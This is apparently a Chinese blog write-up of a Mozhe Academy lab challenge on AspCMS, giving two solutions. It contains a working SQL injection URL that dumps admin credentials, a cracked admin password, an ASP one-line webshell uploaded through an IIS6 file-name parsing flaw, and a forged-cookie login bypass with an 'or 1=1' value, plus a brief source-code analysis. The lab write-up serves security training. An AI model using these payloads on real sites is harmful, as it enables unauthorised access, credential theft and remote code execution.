墨者学院—CMS系统漏洞分析溯源(第4题)—两种解法

最新推荐文章于 2024-04-18 11:03:56 发布
最新推荐文章于 2024-04-18 11:03:56 发布
阅读量924 收藏 1
点赞数
分类专栏: # 墨者学院 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ploto_cs/article/details/109166206
版权

一.解题思路

登录后台利用文件解析漏洞插入一句话木马

二.操作步骤

解法一

1.利用注入漏洞,获取后台密码
构造语句

http://ip:port/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

在这里插入图片描述

得到后台密码:121b28fa741f0976
经过MD5解密后:4rfv3edc2wsx1qaz
在这里插入图片描述

默认用户名:admin
密码:4rfv3edc2wsx1qaz

2.登录后台
默认用户名:admin
密码:4rfv3edc2wsx1qaz
在这里插入图片描述

浏览网址发现在界面风格——编辑模块/CSS文件中的文件可以任意修改和添加文件
在这里插入图片描述

3.插入木马
点击添加模板
该CMS正好存在IIS6.0解析漏洞
构造文件名为:hack.asp;.html
文件信息为:<%eval request (“pass”)%>
在这里插入图片描述

4.连接蚁剑
在这里插入图片描述
可以在文件根目录下看到密钥信息
在这里插入图片描述

解法二

1.打开cookie manger
利用 cookie manger伪造cookie,登录后台

添加下列字段
groupMenu=all
adminrand=1
adminName=admin’ or ‘1’=’1
在这里插入图片描述

2.查询http://ip:port/admin,就可以直接进入后台
在这里插入图片描述

3.获取key值
后面操作与解法一相同

漏洞解析

参考文章: https://blog.csdn.net/u014549283/article/details/81810940

在文件inc—AspCms_CommonFun.asp中的1086-1124行可以看到源码中存在相应问题
在这里插入图片描述在这里插入图片描述

在1088行alertMsgAndGo"您还没有登陆","/" ——证明adminname不能为空
在1093行alertMsgAndGo"您没有访问权限","-1" ——证明groupMenu需要等于all
在1121行alertMsgAndGo"您没有访问权限","-1" ——证明adminrand值需要为一个数字,SQL语句必须成立且返回数字为1时才具有访问权限

网络信息安全——ploto

ploto_cs
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院_CMS系统漏洞分析溯源(第4)
weixin_50698958的博客
10-10 719
靶场: https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe 背景介绍 ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异的公司企业网站。ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 实训目标 1.学习登录绕过
墨者学院 - CMS系统漏洞分析溯源(第4)
多崎巡礼的博客
10-09 1016
使用火狐插件cookie-editor 新增一个cookie value如下 username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70...
墨者 - CMS系统漏洞分析溯源(第4)
吃肉唐僧的博客
07-19 1011
用御剑扫描后台 当访问admin/home.asp时候,提示还没登录 上网搜索aspcms的漏洞 参考;https://www.webshell.cc/2944.html 用 cookie manger伪造cookie cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageA...
1day-AspCMS commentList.asp接口处存在SQL注入漏洞
weixin_43167326的博客
04-18 720
AspCms”是一个开源的内容管理系统(CMS),基于ASP.NET技术开发。它提供了创建和管理网站内容的功能,包括文章、图片、视频等。aspcms具有易用性和灵活性,适用于中小型网站的建设。AspCMS commentList.asp接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
墨者学院-CMS系统漏洞分析溯源(第4)
JimWu的博客
09-04 781
CMS系统漏洞分析溯源(第4) 难易程度:★★★ 目类型:身份认证和会话管理 使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场,用wwwscan扫一下。 发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp,显示还没有登陆。 3.使用cookie-editor,伪造cookie,添加use...
360众测靶场库之32-CMS系统漏洞分析溯源(第4)
zjl12344的博客
03-08 207
360众测靶场
WebShell文件上传漏洞分析溯源
02-22
WebShell文件上传漏洞
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
墨者安全专家第二代 彻底免疫未知病毒
11-02
同时第二代集终身趋势免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是第二代的“革离术”,在第一代基础上能让用户简单利用权限管理等功能,并且有效阻止...
免费墨者安全专家第二代 V3.7.0.4 正式版(无功能限制)
11-01
同时第二代集终身趋势免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是第二代的“革离术”,在第一代基础上能让用户简单利用权限管理等功能,并且有效阻止...
spring IOC实现(墨者革离)
12-12
该代码主要用于spring IOC的实现(墨者革离),模拟一个城门叩问的编剧场景
墨者CMS系统漏洞分析溯源(第4)
zr1213159840的博客
01-28 1066
打开给的链接的页面,能发现是aspcms,还给了一个登录框 通过搜索发现,aspcms存在一个注入漏洞,拿到登录名和密码 http://219.153.49.228:45597//plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 对密码进行一
0day漏洞(aspcms)漏洞实战
weixin_49071539的博客
12-16 3312
1. 谷歌搜索关键字 Powered by aspcms.com Copyright ?2010-2011 intitle:Powered by AspCms2 2. 接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 3.
2019强网杯“随便注“
热门推荐
stybill的博客
10-14 5万+
目 解思路 探测有无注入 1' 报错 1'# 正常且为True 1' and 1=1# 正常且为True 1' and 1=2# 正常且为False 可以得知存在注入,并且参数使用单引号闭合。 获取列数 1' order by 1# 1' order by 2# 1' order by 3# 报错 可以得知,列数为2 尝试获取数据库名、用户基本信息等 1.使用联合注入查询: -1' union se/**/lect null, user()# 报错: return preg.
墨者 - CMS系统漏洞分析溯源(第8)
吃肉唐僧的博客
07-23 936
进入环境之后,二话不说用wwwscan对着靶机一段乱扫 真的又出来了喔!!虽然时间有点久(御剑又扫不出来.....) 后台地址/manager/login.php,登录之后 因为第七的用户有admin,所以账号猜测为admin 根据目要求,尝试了admin,root等弱密码无果 因为验证码会刷新,用brup爆破无果 后来看了一篇writeup:https://www.j...
墨者学院---CMS系统漏洞分析溯源(第5)
qq_35105713的博客
10-25 1157
 cookie添加 admin_name字段,Value任意。保存 访问http://219.153.49.228:48489/admin/cms_admin.php,即可获得key
【WEB】WebShell代码分析溯源(第4)
HAPPY
08-19 1162
查看到可以webshell后定位到源代码:   这个的用法: get网址中传入 ?e=YXNzZXJ0   (arrest的base64加密值为YXNzZXJ0) 菜刀连接用法: http://www.xxx.com/3.php?e=YXNzZXJ0 密码:POST 详解:base64_decode()函数主要用于base64的解码,YXNzZXJ0的base64解码后的结果为...
墨者 - CMS系统漏洞分析溯源(第5)
吃肉唐僧的博客
07-19 836
御剑一顿乱扫 挖到后台登录地址 卡住了,不知如何入手 后来看到别人的解思路,别人是直接下载了该网站的源码分析, 参考链接:https://www.yuag.org/2016/08/23/phpecms1-3-cookies%E6%AC%BA%E9%AA%97%E6%BC%8F%E6%B4%9E%E8%BF%9B%E5%90%8E%E5%8F%B0/ phpecms1.3/admi...
注入id列表_开源CMS实战渗透测试ASPCMS注入
weixin_39926613的博客
11-27 954
实验等级:中级任务场景:【任务场景】小王在对ASPCMS进行代码审计时,发现ASPCMS的API存在较大的安全问。在查阅资料后,发现该CMS的逻辑漏洞会导致SQL语句执行漏洞。任务分析:【任务分析】通过阅读源码,找到commentList.asp中的逻辑漏洞。使用处理过的SQL语句执行获取管理员信息,并对其密码进行MD5解密,最终实现盗取管理员账号密码的效果。预备知识:【预备知识】A...
墨者学院 windows硬盘文件分析取证(新建的用户名) 犯罪嫌疑人在使用过电脑之后并
12-15
墨者学院的Windows硬盘文件分析取证是一种通过对电脑硬盘上的文件进行分析来获取相关信息的技术手段。当涉及到犯罪调查时,这项技术可以帮助警方揭示犯罪嫌疑人的行为轨迹和证据。 在对犯罪嫌疑人所使用的计算机进行分析取证时,我们首先需要新建一个用户名。新建用户名的目的是为了保护我们操作的隐私和安全,以免意外地影响现有的用户设置或对系统产生不可逆的影响。这个新建的用户名仅用于分析取证过程。 一旦新建了用户名,我们可以开始进行分析取证工作。首先,我们会使用专业的取证软件对硬盘进行扫描,以找到潜在的关键文件和目录。通过恢复已删除的文件和检测隐藏的文件,我们可以获取更全面的信息。 接着,我们会对文件进行深入的分析。通过文件的创建时间、修改时间、访问记录等元数据信息,我们可以了解文件的活动轨迹。此外,我们还会查找关键词、犯罪工具、恶意软件等可能存在的证据。 在整个过程中,需要确保对取证工作的记录和操作都能被完整地保存下来,以确保后续的法律程序和证据呈现的可靠性。 综上所述,墨者学院的Windows硬盘文件分析取证可以帮助调查人员揭示犯罪嫌疑人的行为痕迹和相关证据,而新建的用户名则是为了保护我们操作的隐私和安全。通过有效的电脑取证工作,我们能够为正义的伸张提供有力的证据支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值